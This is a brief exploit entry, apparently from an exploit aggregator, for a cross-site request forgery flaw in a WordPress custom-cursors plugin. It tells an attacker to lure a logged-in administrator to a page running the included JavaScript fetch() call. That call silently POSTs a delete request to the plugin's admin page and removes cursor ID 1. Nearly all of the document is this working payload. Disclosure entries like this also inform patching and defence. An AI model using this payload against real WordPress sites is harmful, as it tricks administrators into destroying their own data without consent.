## https://sploitus.com/exploit?id=WPEX-ID:27816C70-58AD-4FFB-ADCC-69EB1B210744
Make a logged in admin open a page with the following JS code:
fetch('https://example.com/wp-admin/admin.php?page=wp_custom_cursors', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'submit&delete_row=1'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
This will make them delete the cursor with ID 1